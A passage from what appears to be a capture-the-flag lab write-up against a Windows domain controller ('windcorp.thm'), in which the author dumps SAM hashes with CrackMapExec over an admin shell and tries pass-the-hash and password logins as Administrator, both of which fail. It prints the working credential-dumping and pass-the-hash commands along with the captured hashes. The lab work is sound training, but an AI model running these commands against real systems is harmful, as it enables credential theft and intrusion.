SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
  • One last thing to grab (the flag)…
LOOT >> Flag3.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat Flag3.txt
<REDACTED>

PRIVESC? >> that juicy Administrator password…

  • With an admin shell, CrackMapExec can dump the SAM database. Mind what that is on a domain controller, though: the SAM holds only the machine-local accounts, and its Administrator entry is the DSRM (Directory Services Restore Mode) account, not the domain Administrator, whose secrets live in NTDS.dit:
❯ crackmapexec smb 10.10.26.119 -u stimpz0r -p r00t3d! --sam
SMB         10.10.26.119    445    FIRE             [*] Windows 10.0 Build 17763 x64 (name:FIRE) (domain:windcorp.thm) (signing:True) (SMBv1:False)
SMB         10.10.26.119    445    FIRE             [+] windcorp.thm\stimpz0r:r00t3d! (Pwn3d!)
SMB         10.10.26.119    445    FIRE             [+] Dumping SAM hashes
SMB         10.10.26.119    445    FIRE             Administrator:500:aad3b435b51404eeaad3b435b51404ee:a47c1e6ce2d356a67cde3a743b465b16:::
SMB         10.10.26.119    445    FIRE             Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.26.119    445    FIRE             DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ERROR:root:SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
SMB         10.10.26.119    445    FIRE             [+] Added 3 SAM hashes to the database


  • BUT – no dice… 🙁 Neither the cracked password nor pass-the-hash with the dumped hash authenticates as windcorp.thm\Administrator, which is exactly what you would expect if the hash belongs to the DSRM account. The domain account's hash would have to come from NTDS.dit instead (crackmapexec smb ... --ntds), which was not attempted here:
❯ crackmapexec smb 10.10.26.119 -u Administrator -p Secret1234
SMB         10.10.26.119    445    FIRE             [*] Windows 10.0 Build 17763 x64 (name:FIRE) (domain:windcorp.thm) (signing:True) (SMBv1:False)
SMB         10.10.26.119    445    FIRE             [-] windcorp.thm\Administrator:Secret1234 STATUS_LOGON_FAILURE
❯ crackmapexec winrm 10.10.26.119 -u Administrator -H a47c1e6ce2d356a67cde3a743b465b16
WINRM       10.10.26.119    5985   FIRE             [*] Windows 10.0 Build 17763 (name:FIRE) (domain:windcorp.thm)
WINRM       10.10.26.119    5985   FIRE             [*] http://10.10.26.119:5985/wsman
WINRM       10.10.26.119    5985   FIRE             [-] windcorp.thm\Administrator:a47c1e6ce2d356a67cde3a743b465b16
❯ evil-winrm -i windcorp.thm -u Administrator -p Secret1234

Evil-WinRM shell v3.3

Info: Establishing connection to remote endpoint

Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError

Error: Exiting with code 1


